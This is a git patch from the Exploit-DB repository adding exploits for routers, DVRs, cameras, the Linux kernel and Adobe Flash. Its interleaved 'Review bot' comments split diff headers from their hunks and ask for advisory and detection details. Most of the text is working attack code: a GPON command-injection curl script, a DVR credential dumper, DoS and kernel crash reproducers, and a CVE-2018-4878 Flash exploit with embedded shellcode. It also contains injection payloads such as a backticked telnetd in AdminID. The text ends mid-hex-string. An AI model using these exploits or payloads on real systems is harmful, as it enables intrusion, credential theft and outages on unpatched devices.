From 813a3efbb53bbb4515ea650b80161546affbc785 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 4 May 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-05-04 20 changes to exploits/shellcodes Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow Jnes 1.0.2 - Stack Buffer Overflow Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow netek 0.8.2 - Denial of Service Cisco Smart Install - Crash (PoC) Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1) Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) Adobe Reader PDF - Client Side Request Injection Windows - Local Privilege Escalation Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit) Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit) Adobe Flash < 28.0.0.161 - Use-After-Free Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC) GPON Routers - Authentication Bypass / Command Injection TBK DVR4104 / DVR4216 - Credentials Leak Call of Duty Modern Warefare 2 - Buffer Overflow Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion Squirrelcart 1.x - 'cart.php' Remote File Inclusion Infinity 2.x.x - options[style_dir] Local File Disclosure Infinity 2.x - 'options[style_dir]' Local File Disclosure PHP-Nuke 8.x.x - Blind SQL Injection PHP-Nuke 8.x - Blind SQL Injection WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x - 'clientarea.php' Local File Disclosure Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities Ajax Availability Calendar 3.x - Multiple Vulnerabilities vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection vBulletin vBSEO 4.x - 'visitormessage.php' 
Remote Code Injection WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting Subrion 3.X.x - Multiple Vulnerabilities Subrion 3.x - Multiple Vulnerabilities Ciuis CRM 1.0.7 - SQL Injection LifeSize ClearSea 3.1.4 - Directory Traversal WordPress Plugin Activity Log 2.4.0 - Cross-Site Scripting DLINK DCS-5020L - Remote Code Execution (PoC) Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection --- exploits/hardware/dos/44451.py | 41 ++++ exploits/hardware/remote/44574.txt | 35 +++ exploits/hardware/remote/44576.sh | 9 + exploits/hardware/remote/44577.py | 120 ++++++++++ exploits/hardware/webapps/44580.txt | 11 + exploits/linux/dos/44190.py | 26 ++ exploits/linux/dos/44579.c | 52 ++++ exploits/linux/local/25444.c | 3 + exploits/multiple/remote/44412.py | 84 +++++++ exploits/multiple/webapps/44583.txt | 164 +++++++++++++ exploits/php/webapps/43347.txt | 48 ++++ exploits/php/webapps/44409.txt | 45 ++++ exploits/windows/dos/43116.py | 41 ++++ exploits/windows/dos/43208.py | 77 ++++++ exploits/windows/dos/44273.py | 56 +++++ exploits/windows/dos/44572.txt | 15 ++ exploits/windows/local/44573.txt | 48 ++++ exploits/windows/local/44581.c | 353 ++++++++++++++++++++++++++++ exploits/windows/remote/44582.txt | 11 + exploits/windows/webapps/44390.py | 72 ++++++ files_exploits.csv | 41 +++- 21 files changed, 1341 insertions(+), 11 deletions(-) create mode 100755 exploits/hardware/dos/44451.py create mode 100644 exploits/hardware/remote/44574.txt create mode 100755 exploits/hardware/remote/44576.sh create mode 100755 exploits/hardware/remote/44577.py create mode 100644 exploits/hardware/webapps/44580.txt create mode 100755 exploits/linux/dos/44190.py create mode 100644 exploits/linux/dos/44579.c create mode 100755 exploits/multiple/remote/44412.py create mode 100644 exploits/multiple/webapps/44583.txt create mode 100644 exploits/php/webapps/43347.txt create mode 100644 
exploits/php/webapps/44409.txt create mode 100755 exploits/windows/dos/43116.py create mode 100755 exploits/windows/dos/43208.py create mode 100755 exploits/windows/dos/44273.py create mode 100644 exploits/windows/dos/44572.txt create mode 100644 exploits/windows/local/44573.txt create mode 100644 exploits/windows/local/44581.c create mode 100644 exploits/windows/remote/44582.txt create mode 100755 exploits/windows/webapps/44390.py diff --git a/exploits/hardware/dos/44451.py b/exploits/hardware/dos/44451.py new file mode 100755 index 000000000..c0f6f15e5 --- /dev/null +++ b/exploits/hardware/dos/44451.py @@ -0,0 +1,41 @@ +# smi_ibc_init_discovery_BoF.py + +import socket +import struct +from optparse import OptionParser + +# Parse the target options +parser = OptionParser() +parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args() + +def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'): + return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v + +def send_packet(sock, packet): + sock.send(packet) + +def receive(sock): + return sock.recv() + +if __name__ == "__main__": + + print "[*] Connecting to Smart Install Client ", options.target, "port", options.port + + con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + con.connect((options.target, options.port)) + + payload = 'BBBB' * 44 shellcode = 'D' * 2048 + + data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload + + tlv_1 = craft_tlv(0x00000001, data) tlv_2 = shellcode + + hdr = '\x00\x00\x00\x01' # msg_from + hdr += '\x00\x00\x00\x01' # version + hdr += '\x00\x00\x00\x07' # msg_hdr_type + hdr += struct.pack('>I', len(data)) # data_length + + pkt = hdr + tlv_1 + tlv_2 + + print "[*] Send a malicious packet" + send_packet(con, pkt) \ No newline at end of file 
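Review bot: `receive()` in 44451.py calls `sock.recv()` with no buffer size, which raises TypeError on the first call; nothing in the file calls it, so it should be removed rather than left as a trap. The file also has no header saying which product, software releases and advisory it concerns; the only context is the print string naming the Smart Install Client and the default port 4786 (44576.sh and 44579.c in this commit have the same gap). I would add a top comment such as `# Crash PoC for the Smart Install client listener (TCP/4786); affected releases and fix: <vendor advisory id>` so that someone triaging the entry knows which service to patch or disable. The socket `con` is never closed.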
diff --git a/exploits/hardware/remote/44574.txt b/exploits/hardware/remote/44574.txt
new file mode 100644
index 000000000..983e53332
--- /dev/null
+++ b/exploits/hardware/remote/44574.txt
@@ -0,0 +1,35 @@
+# PoC command injection in BLE service of Norton Core Secure WiFi Router (CVE-2018-5234)
+
+For more information read
+[paper](https://embedi.com/blog/whos-watching-the-watchers-vol-ii-norton-core-secure-wifi-router).
+
+To demonstrate the exploitation, we will use:
+- OS GNU/Linux;
+- Bluetooth dongle adapter;
+- BlueZ utility (for testing Bluetooth connection).
+
+In order to use the script, we will need to set all dependencies in a advance:
+
+```shell
+$ pip install -r ./requirements.txt
+```
+
+With the help of `BlueZ` utilities, we should ensure Bluetooth is enabled and
+functions properly.
+
+1. Restart the router to provide access to the engineering page.
+2. Start the PoC on behalf of the root user (required for operating with
+ Bluetooth) with the command on executing as an argument:
+
+ ```shell
+ $ ./ble_norton_core.py "/etc/init.d/dropbear start"
+ ```
+
+ After the script is successfully executed, we get access to the device via
+ the SSH connection. We put `root` as a user and `admin` as password:
+
+ ```shell
+ $ ssh root@norton.core
+ ```
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44574.zip
\ No newline at end of file
diff --git a/exploits/hardware/remote/44576.sh b/exploits/hardware/remote/44576.sh
new file mode 100755
index 000000000..24e886b66
--- /dev/null
+++ b/exploits/hardware/remote/44576.sh
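Review bot: The write-up names CVE-2018-5234 but gives no affected or fixed firmware version, so a reader cannot tell from this entry whether a given Norton Core unit is still exposed; a line such as `Affected firmware: <versions>; fixed in: <version>` under the title would close that gap. The final step logs in over SSH as `root` with the password `admin`, which the text presents without comment; that fixed credential is a separate finding and should be called out as one. "in a advance" in the dependency paragraph should read "in advance".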
@@ -0,0 +1,9 @@
+#!/bin/bash
+
+echo "[+] Sending the Command… "
+# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
+curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
+echo "[+] Waiting…."
+sleep 3
+echo "[+] Retrieving the ouput…."
+curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’
\ No newline at end of file
diff --git a/exploits/hardware/remote/44577.py b/exploits/hardware/remote/44577.py
new file mode 100755
index 000000000..151f019b5
--- /dev/null
+++ b/exploits/hardware/remote/44577.py
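Review bot: The script records nothing a defender can match on, although everything needed is in its two curl lines: a POST to `/GponForm/diag_Form` and a GET of `/diag.html`, both carrying the `?images/` suffix, with a `dest_host` form value that contains a backtick or `;`. I would put that in a header comment, e.g. `# Indicators: POST /GponForm/diag_Form?images/ with dest_host containing a backtick or ';', then GET /diag.html?images/`, next to the affected models and advisory reference (`<advisory id>`), which the file does not state. Both curl calls pass `-k`, so any certificate is accepted silently; that deserves a one-line comment. `$1` and `$2` are used without any argument count check or usage message.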
@@ -0,0 +1,120 @@ +# -*- coding: utf-8 -*- +import json +import requests +import argparse +import tableprint as tp + +class Colors: + BLUE = '\033[94m' + GREEN = '\033[32m' + RED = '\033[0;31m' + DEFAULT = '\033[0m' + ORANGE = '\033[33m' + WHITE = '\033[97m' + BOLD = '\033[1m' + BR_COLOUR = '\033[1;37;40m' + +banner = ''' + __..--.._ + ..... .--~ ..... `. + .": "`-.. . .' ..-'" :". ` + ` `._ ` _.'`"( `-"'`._ ' _.' ' + ~~~ `. ~~~ + .' + / + ( + ^---' + + + [*] @capitan_alfa +''' + +details = ''' + # Exploit Title: DVRs; Credentials Exposed + # Date: 09/04/2018 + # Exploit Author: Fernandez Ezequiel ( @capitan_alfa ) +''' +parser = argparse.ArgumentParser(prog='getDVR_Credentials.py', + description=' [+] Obtaining Exposed credentials', + epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81', + version="1.1") + +parser.add_argument('--host', dest="HOST", help='Host', required=True) +parser.add_argument('--port', dest="PORT", help='Port', default=80) + +args = parser.parse_args() + +HST = args.HOST +port = args.PORT + +headers = {} + +fullHost_1 = "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list" +host = "http://"+HST+":"+str(port)+"/" + +print Colors.GREEN+banner+Colors.DEFAULT + + +def makeReqHeaders(xCookie): + headers["Host"] = host + headers["User-Agent"] = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)" + headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + headers["Accept-Languag"] = "es-AR,en-US;q=0.7,en;q=0.3" + headers["Connection"] = "close" + headers["Content-Type"] = "text/html" + headers["Cookie"] = "uid="+xCookie + + return headers + +try: + rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000) +except Exception,e: + print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT + exit() + +badJson = rX.text +try: + dataJson = json.loads(badJson) + totUsr = len(dataJson["list"]) #--> 10 +except Exception, e: + print " [+] Error: "+str(e) + print " [>] json: "+str(rX) +# 
print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin")) + exit() + + +print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN +print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT + +print Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT +print " " + +final_data = [] +try: + for obj in range(0,totUsr): + + temp = [] + + _usuario = dataJson["list"][obj]["uid"] + _password = dataJson["list"][obj]["pwd"] + _role = dataJson["list"][obj]["role"] + + temp.append(_usuario) + temp.append(_password) + temp.append(_role) + + final_data.append(temp) + + hdUsr = Colors.GREEN + "Username" + Colors.DEFAULT + hdPass = Colors.GREEN + "Password" + Colors.DEFAULT + hdRole = Colors.GREEN + "Role ID" + Colors.DEFAULT + + cabeceras = [hdUsr, hdPass, hdRole] + + tp.table(final_data, cabeceras, width=20) + +except Exception, e: + print "\n [!]: "+str(e) + print " [+] "+ str(dataJson) + +print "\n" \ No newline at end of file diff --git a/exploits/hardware/webapps/44580.txt b/exploits/hardware/webapps/44580.txt new file mode 100644 index 000000000..a23181f1f --- /dev/null +++ b/exploits/hardware/webapps/44580.txt 
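Review bot: The first `except Exception,e:` in 44577.py prints "Timed out" for every failure of `requests.get` (refused connection, name resolution error, bad port), so the message is wrong in most cases; use `except requests.exceptions.Timeout:` for that text and report any other `requests.exceptions.RequestException` with `str(e)`. `makeReqHeaders` fills the module-level `headers` dict instead of returning a fresh one, and the key `Accept-Languag` is misspelled. The script prints every recovered password in clear text with no way to suppress it, which matters when terminal output is logged during an assessment. For detection, the request it sends is `GET /device.rsp?opt=user&cmd=list` with `Cookie: uid=admin`; stating that, and the affected firmware, in the `details` block would make the entry usable for writing a log or IDS rule.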
@@ -0,0 +1,11 @@
+“The DCS-5020L Wireless N Day & Night Pan/Tilt Cloud Camera is a day/night network camera that easily connects to your existing home network for remote viewing on a range of mobile devices. It features pan, tilt and digital zoom function to allow you to see a wider area with a single camera, built-in Wi-Fi extender to effortlessly expand your wireless coverage, night vision up to 5 metres, sound and motion detection for the ultimate in peace of mind, and H.264 video compression for a high-quality image.”
+
+This walkthrough demonstrates just how easy it can be to find vulnerabilities in Internet of Things (IOT) devices. The process of finding the following command injection can be broken down into 3 steps that are more akin to a 100 point CTF challenge: download binary, run strings, trace input to system call to origin.
+
+
+
+
+
+An attacker can escape the ‘sed’ command with a simple payload, such as ‘`touch a`’. Another example that fits is AdminID=a’`telnetd`’, which allows a user to login as “a”, which becomes the new root account:
+
+Source: https://www.fidusinfosec.com/dlink-dcs-5030l-remote-code-execution-cve-2017-17020/
\ No newline at end of file
diff --git a/exploits/linux/dos/44190.py b/exploits/linux/dos/44190.py
new file mode 100755
index 000000000..00005c066
--- /dev/null
+++ b/exploits/linux/dos/44190.py
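Review bot: The entry is titled and quoted as DCS-5020L, while the source URL on the last line names `dlink-dcs-5030l-...-cve-2017-17020`; the text should state which models and firmware versions are affected, for example with a line `Affected: <models / firmware versions> (CVE-2017-17020)`. The five empty lines between the second and the last paragraph look like the places where the original post had screenshots, so the `sed` call and the `AdminID` parameter are referred to without the code that introduces them. The last paragraph ends in a colon with nothing after it.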
@@ -0,0 +1,26 @@ +#Exploit Title : netek 0.8.2 FTP Denial of Service +#Test on : windowsXPs3 + windows 7 +#software Link :https://sourceforge.net/projects/netek.berlios/ +#version : 0.8.2 +#author : Lawrence Amer +#site : lawrenceamer.me +#affected product uses default port 30817 , it can be chnaged also +#!/bin/python +import socket + + +ip = raw_input("[+] IP to attack: ") + +sarr = [] +i = 0 +while True: + try: + sarr.append(socket.create_connection((ip,30817))) + print "[+] Connection %d" % i + crash1 = "\x41"*5000 +"\X42"*1000 + sarr[i].send(crash1+'\r\n') + i+=1 + except socket.error: + print "[*] Server crashed with CPU 100!!" + raw_input() + break \ No newline at end of file diff --git a/exploits/linux/dos/44579.c b/exploits/linux/dos/44579.c new file mode 100644 index 000000000..e203d80e7 --- /dev/null +++ b/exploits/linux/dos/44579.c @@ -0,0 +1,52 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +struct sockaddr_llc { + short sllc_family; + short sllc_arphrd; + unsigned char sllc_test; + unsigned char sllc_xid; + unsigned char sllc_ua; + unsigned char sllc_sap; + unsigned char sllc_mac[6]; + unsigned char __pad[2]; +}; + +void test() +{ + int fd = socket(AF_LLC, SOCK_STREAM, 0); + char output[32] = "lo"; + socklen_t len; + setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, &output, 0x10); + struct sockaddr_llc addr1 = {.sllc_family = AF_LLC, .sllc_sap = 2}; + bind(fd, (const struct sockaddr *)&addr1, sizeof(struct sockaddr_llc)); + struct sockaddr_llc addr2 = {.sllc_family = AF_LLC, .sllc_sap = 2}; + connect(fd, (const struct sockaddr *)&addr2, sizeof(struct sockaddr_llc)); + + char msg[0x10] = "aaaa"; + send(fd, msg, 0x10, 0); +} + +int main() +{ + test(); + return 0; +} \ No newline at end of file 
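Review bot: 44190.py is added under `exploits/linux/dos/` while its own header says `Test on : windowsXPs3 + windows 7`; either the platform directory or the header is wrong, and the row added to files_exploits.csv should agree with whichever is right. The `#!/bin/python` line comes eighth, after the comment block, where it is an ordinary comment; a shebang only takes effect as the first line. The `except socket.error` branch prints "Server crashed" for any socket error, including a refused first connection, so the output cannot be read as proof the service was affected. The sockets collected in `sarr` are never closed.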
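Review bot: None of the calls in `test()` in 44579.c has its return value checked (`socket`, `setsockopt`, `bind`, `connect`, `send`), so on a kernel built without AF_LLC the program carries on with fd -1 and exits 0, which reads as "not affected" when nothing was exercised. Start with `if (fd < 0) { perror("socket"); return; }` and apply the same pattern to the other calls. `socklen_t len` is declared and never used. The file has no comment tying it to the commit subject line "Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free"; a header such as `/* Reproducer: AF_LLC double free, Linux < 4.17-rc1; fixed upstream by <commit id> */` would tell a reader which kernels to check. The `#include` lines show no header names on this page, presumably lost in rendering.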
diff --git a/exploits/linux/local/25444.c b/exploits/linux/local/25444.c index 0ab2e5202..b75911d2a 100644 --- a/exploits/linux/local/25444.c +++ b/exploits/linux/local/25444.c @@ -6,6 +6,9 @@ * update may 2013: * seems like centos 2.6.32 backported the perf bug, lol. * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist. + * + * EDB Note: Update ~ http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/ + * ~ https://github.com/realtalk/cve-2013-2094/blob/master/rewritten_semtex.c */ #define _GNU_SOURCE 1 diff --git a/exploits/multiple/remote/44412.py b/exploits/multiple/remote/44412.py new file mode 100755 index 000000000..31233c415 --- /dev/null +++ b/exploits/multiple/remote/44412.py 
@@ -0,0 +1,84 @@ +#!/usr/bin/env python +# coding: UTF-8 +import BaseHTTPServer +import sys +from SimpleHTTPServer import SimpleHTTPRequestHandler + +print "@Syfi2k" +print "[+] CVE-2018-4878 poc " +print "--------------------------------" +print "Calc.exe Shellcode via Msfvenom" +print "Based on fixed version https://github.com/anbai-inc/CVE-2018-4878" +print "No Crash without executing the Shellcode, Sandbox? try it yourself" + + +buf = "" +buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" +buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" +buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" +buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" +buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" +buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" +buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" +buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" +buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" +buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" +buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00" +buf += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5" +buf += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a" +buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" +buf += "\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" + +payload = buf +data = "" +flash_name = "movie" + + + +data = 
"\x46\x57\x53\x20\xE3\x45\x00\x00\x78\x00\x04\xE2\x00\x00\x0E\xA6\x00\x00\x18\x01\x00\x44\x11\x19\x00\x00\x00\x7F\x13\x1F\x02\x00\x00\x3C\x72\x64\x66\x3A\x52\x44\x46\x20\x78\x6D\x6C\x6E\x73\x3A\x72\x64\x66\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x31\x39\x39\x39\x2F\x30\x32\x2F\x32\x32\x2D\x72\x64\x66\x2D\x73\x79\x6E\x74\x61\x78\x2D\x6E\x73\x23\x22\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x72\x64\x66\x3A\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x20\x78\x6D\x6C\x6E\x73\x3A\x64\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x70\x75\x72\x6C\x2E\x6F\x72\x67\x2F\x64\x63\x2F\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2F\x31\x2E\x31\x22\x20\x72\x64\x66\x3A\x61\x62\x6F\x75\x74\x3D\x22\x22\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x66\x6F\x72\x6D\x61\x74\x3E\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x73\x68\x6F\x63\x6B\x77\x61\x76\x65\x2D\x66\x6C\x61\x73\x68\x3C\x2F\x64\x63\x3A\x66\x6F\x72\x6D\x61\x74\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x74\x69\x74\x6C\x65\x3E\x41\x64\x6F\x62\x65\x20\x46\x6C\x65\x78\x20\x34\x20\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x3C\x2F\x64\x63\x3A\x74\x69\x74\x6C\x65\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x3E\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x64\x6F\x62\x65\x2E\x63\x6F\x6D\x2F\x70\x72\x6F\x64\x75\x63\x74\x73\x2F\x66\x6C\x65\x78\x3C\x2F\x64\x63\x3A\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x70\x75\x62\x6C\x69\x73\x68\x65\x72\x3E\x75\x6E\x6B\x6E\x6F\x77\x6E\x3C\x2F\x64\x63\x3A\x70\x75\x62\x6C\x69\x73\x68\x65\x72\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x63\x72\x65\x61\x74\x6F\x72\x3E\x75\x6E\x6B\x6E\x6F\x77\x6E\x3C\x2F\x64\x63\x3A\x63\x72\x65\x61\x74\x6F\x72\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x6C\x61\x6E\x67\x75\x61\x67\x65\x3E\x45\x4E\x3C\x2F\x64\x63\x3A\x6C\x61\x6E\x67\x75\x61\x67\x65\x3E\x0D\x0
A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x64\x61\x74\x65\x3E\x46\x65\x62\x20\x36\x2C\x20\x32\x30\x31\x38\x3C\x2F\x64\x63\x3A\x64\x61\x74\x65\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x2F\x72\x64\x66\x3A\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x3E\x20\x3C\x2F\x72\x64\x66\x3A\x52\x44\x46\x3E\x0D\x0A\x00\xD0\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x10\xE8\x03\x3C\x00\x43\x02\xFF\xFF\xFF\xC8\x0A\x66\x6C\x61\x73\x68\x30\x32\x00\xFF\x15\x82\x0B\x00\x00\x02\x00\x00\x00\x00\x00" + + +filler = 2940 - len(payload) + +data = data + payload + "\x90" * filler + + +data = data + "\x13\x0E\x01\x00\x02\x00\x73\x68\x65\x6C\x6C\x63\x6F\x64\x42\x79\x74\x65\x73\x00\x00\xBF\x14\xB6\x06\x00\x00\x01\x00\x00\x00\x4D\x61\x69\x6E\x45\x78\x70\x00\x10\x00\x2E\x00\x02\x00\x28\x8E\xCD\xBD\x06\xAD\xCA\x75\x8F\xCD\xBD\x06\xAE\xE4\xE0\x03\x8E\xCD\xBD\x06\xFC\xE2\x75\x8E\xCD\xBD\x06\xFE\xF0\x75\x8E\xCD\xBD\x06\xF8\xF8\x75\x8F\xCD\xBD\x06\xF9\xFE\xA1\x03\x8E\xCD\xBD\x06\xF8\xDE\x75\x89\xCD\xBD\x06\xDC\xB6\xCD\x02\xD6\xF6\x68\x8F\xCD\xBD\x06\xFA\xE6\xCD\x03\x8F\xCD\xBD\x06\xF5\xDC\xA1\x03\x8E\xCD\xBD\x06\xF1\xDC\x74\x8F\xCD\xBD\x06\xD1\xBA\xFD\x02\x8F\xCD\xBD\x06\xEC\xDC\xCD\x03\x8E\xCD\xBD\x06\xEF\xE4\x75\x8E\xCD\xBD\x06\xEE\xF8\x75\x8E\xCD\xBD\x06\xE9\xF0\x75\x89\xCD\xBD\x06\xEE\xE6\xDD\x03\xFF\xD0\x69\x8F\xCD\xBD\x06\xCB\xAA\xC9\x02\x93\xCD\xBD\x06\x00\x55\x07\x4D\x61\x69\x6E\x45\x78\x70\x05\x76\x61\x72\x5F\x31\x00\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x76\x61\x72\x5F\x32\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x06\x64\x61\x74\x61\x31\x34\x06\x64\x61\x74\x61\x31\x35\x3C\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x4D\x69\x68\x61\x5C\x41\x64\x6F\x62\x65\x4D\x69\x6E\x65\x50\x6F\x43\x5F\x74\x72\x79\x69\x6E\x67\x54\x6F\x45\x76\x61\x64\x65\x53\x65\x63\x53\x6F\x6C\x75\x74\x69\x6F\x6E\x73\x66\x6C\x61\x30\x31\x2E\x61\x73\x05\x64\x61\x74\x61\x32\x05\x64\x61\x74\x61\x33\x09\x42\x79\x74\x65\x41\x72\x72\x61\x79\x0B\x66\x6C\x61\x73\x68\x2E
\x75\x74\x69\x6C\x73\x06\x45\x6E\x64\x69\x61\x6E\x0D\x4C\x49\x54\x54\x4C\x45\x5F\x45\x4E\x44\x49\x41\x4E\x06\x65\x6E\x64\x69\x61\x6E\x0C\x43\x61\x70\x61\x62\x69\x6C\x69\x74\x69\x65\x73\x0C\x66\x6C\x61\x73\x68\x2E\x73\x79\x73\x74\x65\x6D\x07\x76\x65\x72\x73\x69\x6F\x6E\x01\x2C\x01\x20\x07\x72\x65\x70\x6C\x61\x63\x65\x21\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x6F\x62\x65\x2E\x63\x6F\x6D\x2F\x41\x53\x33\x2F\x32\x30\x30\x36\x2F\x62\x75\x69\x6C\x74\x69\x6E\x05\x73\x70\x6C\x69\x74\x05\x41\x72\x72\x61\x79\x0C\x4D\x61\x69\x6E\x45\x78\x70\x2E\x61\x73\x24\x30\x14\x66\x6C\x61\x73\x68\x2E\x64\x69\x73\x70\x6C\x61\x79\x3A\x53\x70\x72\x69\x74\x65\x24\x66\x6C\x61\x73\x68\x2E\x64\x69\x73\x70\x6C\x61\x79\x3A\x44\x69\x73\x70\x6C\x61\x79\x4F\x62\x6A\x65\x63\x74\x43\x6F\x6E\x74\x61\x69\x6E\x65\x72\x1F\x66\x6C\x61\x73\x68\x2E\x64\x69\x73\x70\x6C\x61\x79\x3A\x49\x6E\x74\x65\x72\x61\x63\x74\x69\x76\x65\x4F\x62\x6A\x65\x63\x74\x1B\x66\x6C\x61\x73\x68\x2E\x64\x69\x73\x70\x6C\x61\x79\x3A\x44\x69\x73\x70\x6C\x61\x79\x4F\x62\x6A\x65\x63\x74\x1C\x66\x6C\x61\x73\x68\x2E\x65\x76\x65\x6E\x74\x73\x3A\x45\x76\x65\x6E\x74\x44\x69\x73\x70\x61\x74\x63\x68\x65\x72\x00\x06\x4E\x75\x6D\x62\x65\x72\x07\x63\x6C\x61\x73\x73\x5F\x31\x05\x76\x61\x72\x5F\x33\x0F\x4D\x61\x69\x6E\x45\x78\x70\x2F\x4D\x61\x69\x6E\x45\x78\x70\x0A\x69\x73\x44\x65\x62\x75\x67\x67\x65\x72\x05\x76\x61\x72\x5F\x34\x07\x66\x6C\x61\x73\x68\x31\x30\x05\x76\x61\x72\x5F\x35\x0F\x4D\x61\x69\x6E\x45\x78\x70\x2F\x66\x6C\x61\x73\x68\x32\x31\x04\x76\x6F\x69\x64\x05\x43\x6C\x61\x73\x73\x17\x5F\x5F\x67\x6F\x5F\x74\x6F\x5F\x64\x65\x66\x69\x6E\x69\x74\x69\x6F\x6E\x5F\x68\x65\x6C\x70\x03\x70\x6F\x73\x03\x33\x36\x34\x03\x34\x36\x33\x03\x34\x39\x38\x03\x35\x33\x37\x03\x31\x39\x39\x03\x32\x32\x39\x03\x69\x6E